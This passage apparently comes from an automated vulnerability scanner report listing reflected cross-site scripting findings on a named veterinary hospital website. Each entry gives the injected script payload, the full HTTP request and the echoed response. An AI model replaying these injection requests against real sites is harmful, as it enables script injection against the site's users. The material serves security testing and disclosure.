<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=6c92a"><script>alert(1)</script>7d4cd1323ce&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e17
...[SNIP]...

2.26. http://www.vcahospitals.com/main/offer [formtype parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the formtype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d982d"><script>alert(1)</script>197f4942bd8 was submitted in the formtype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORPd982d"><script>alert(1)</script>197f4942bd8&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.co
m%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:20 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=koa2mkuvdq1cjng1duqsnnc194; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORPd982d"><script>alert(1)</script>197f4942bd8&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bc
...[SNIP]...

2.27. http://www.vcahospitals.com/main/offer [gclid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the gclid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5d2e"><script>alert(1)</script>46361887d43 was submitted in the gclid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAwc5d2e"><script>alert(1)</script>46361887d43 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:04:45 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=6h96hdei9ppruniesbkufjpql5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAwc5d2e"><script>alert(1)</script>46361887d43" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.28. http://www.vcahospitals.com/main/offer [guid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the guid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1e65"><script>alert(1)</script>2aa17c446a7 was submitted in the guid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?&state=FL&guid=2505B0C6-B6AA-4144-878F-54873D353284e1e65"><script>alert(1)</script>2aa17c446a7 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:09 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FL&guid=2505B0C6-B6AA-4144-878F-54873D353284e1e65"><script>alert(1)</script>2aa17c446a7" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.29. http://www.vcahospitals.com/main/offer [ipaddress parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the ipaddress request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cea7b"><script>alert(1)</script>d52b0fd037e was submitted in the ipaddress parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243cea7b"><script>alert(1)</script>d52b0fd037e&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.co
m%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:31 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=uefdkgce6dqe7oss7nrn93f4p3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243cea7b"><script>alert(1)</script>d52b0fd037e&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2
...[SNIP]...

2.30. http://www.vcahospitals.com/main/offer [lname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the lname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f871"><script>alert(1)</script>0ec73ab7706 was submitted in the lname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=6f871"><script>alert(1)</script>0ec73ab7706&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.co
m%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:38 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=if7jtr5gtqf6aveee5163p5q63; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=6f871"><script>alert(1)</script>0ec73ab7706&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2
...[SNIP]...

2.31. http://www.vcahospitals.com/main/offer [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79ed5"><script>alert(1)</script>092fe4b7483 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw&79ed5"><script>alert(1)</script>092fe4b7483=1 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:04:55 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=oiivkiojrucik62g0md3t4kjd6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw&79ed5"><script>alert(1)</script>092fe4b7483=1" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.32. http://www.vcahospitals.com/main/offer [newmex parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the newmex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cd11"><script>alert(1)</script>bb1f3698051 was submitted in the newmex parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=04cd11"><script>alert(1)</script>bb1f3698051&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.co
m%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%